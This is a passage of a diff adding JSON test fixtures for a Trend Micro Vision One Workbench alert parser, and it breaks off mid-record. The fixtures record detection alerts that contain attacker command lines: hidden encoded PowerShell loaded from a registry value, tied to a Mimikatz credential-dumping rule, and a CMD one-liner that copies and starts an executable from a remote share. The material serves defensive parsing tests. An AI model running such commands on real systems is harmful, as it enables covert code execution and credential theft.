$x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json new file mode 100644 index 000000000..a95ac7fc8 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", 